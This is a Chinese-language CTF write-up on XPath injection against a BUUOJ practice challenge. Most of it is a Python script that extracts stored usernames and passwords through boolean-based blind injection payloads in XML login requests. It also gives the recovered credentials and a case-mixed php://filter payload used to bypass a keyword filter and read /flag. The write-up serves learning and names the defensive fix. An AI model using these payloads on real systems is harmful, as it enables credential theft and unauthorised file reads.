XPATH注入学习
一道 XPath 注入题，又是陌生的知识，学习一下。
上面的文章已经写得很通俗易懂了，这里不再赘述，直接上脚本。
import time
import requests
import re
import string
import logging
# LOG_FORMAT = "%(lineno)d - %(asctime)s - %(levelname)s - %(message)s"
# logging.basicConfig(level=logging.DEBUG, format=LOG_FORMAT)
# Practice target for this write-up (a BUUOJ challenge node); the login endpoint is login.php.
target = 'http://a6b8c73c-96c1-4e55-9f69-98d870a6fc1e.node3.buuoj.cn/login.php'

# A single session is reused so the token fetched from the page and the POST that
# replays it share the same cookies.
s = requests.session()

# Candidate alphabet tried for each character position of the extracted value.
str1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_!@#$%^&*()'

# The login form is posted as an XML document, hence the explicit Content-Type.
head = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",
    "Content-Type": "application/xml",
}

# Pulls the hidden per-page token out of the login form HTML.
find = re.compile('<input type="hidden" id="token" value="(.*?)" />')

# Boolean-based probes, each one a conditional spliced into the <username> field.
# The earlier ones (kept as comments, in the order they were used) walk the XML
# document tree one level at a time; the active ones read the user record.
# root node
# payload="<username>'or substring(name(/*[1]),{},1)='{}' or '=</username><password>123</password><token>{}</token>"
# child node of the root
# payload="<username>'or substring(name(/root/*[1]), {}, 1)='{}' or '=</username><password>3123</password><token>{}</token>"
# accounts node
# payload="<username>'or substring(name(/root/accounts/*[1]), {}, 1)='{}' or '=</username><password>3123</password><token>{}</token>"
# user node
payload = "<username>'or substring(name(/root/accounts/user/*[2]), {}, 1)='{}' or '=</username><password>3123</password><token>{}</token>"
# username and password of the second user record
payload_username = "<username>'or substring(/root/accounts/user[2]/username/text(), {}, 1)='{}' or '=</username><password>3123</password><token>{}</token>"
payload_password = "<username>'or substring(/root/accounts/user[2]/password/text(), {}, 1)='{}' or '=</username><password>3123</password><token>{}</token>"
def exp():
    """Recover the targeted text value one character at a time.

    For each position, every character of ``str1`` is tried through
    ``payload_username``; the script treats the string ``'非法操作!'`` in the
    response as the signal that the guessed character is correct. It stops at
    the first position where no candidate matches, or after 99 positions.
    Progress is printed as it goes, and the final value is printed at the end.

    The weakness this relies on is user input being concatenated unescaped
    into an XPath expression; the defensive fix is to bind values through
    XPath variables (or escape the quote characters) rather than build the
    query by string concatenation.
    """
    recovered = ''
    for pos in range(1, 100):
        matched = False
        for ch in str1:
            # The hidden token is re-read before every attempt; the page
            # presumably issues a new one per request (not shown here).
            page = s.post(url=target)
            token = find.findall(page.text)
            resp = s.post(
                url=target,
                headers=head,
                data=payload_username.format(pos, ch, token[0]),
            )
            if '非法操作!' in resp.text:
                matched = True
                recovered += ch
                print("now :{}".format(recovered))
                break
        # No candidate matched at this position: the value has been fully read.
        if not matched:
            break
    print("最终结果: {}".format(recovered))
# Only run the extraction when executed as a script, not on import.
if __name__ == "__main__":
    exp()
最后跑出来的用户名是 adm1n，密码是 cf7414b5bdb2e65ee43083f4ddbc4d9f。
该密码是 MD5 摘要，反查后得到明文密码 gtfly123。
登录成功后得到一串 base64 编码的字符串。
提示 flag 在 /flag。
看 url，应该是要读文件。
无法直接读，因为过滤了关键字；最后通过伪协议关键字大小写混写绕过：
phP://filter/convert.bAse64-encode/resource=/flag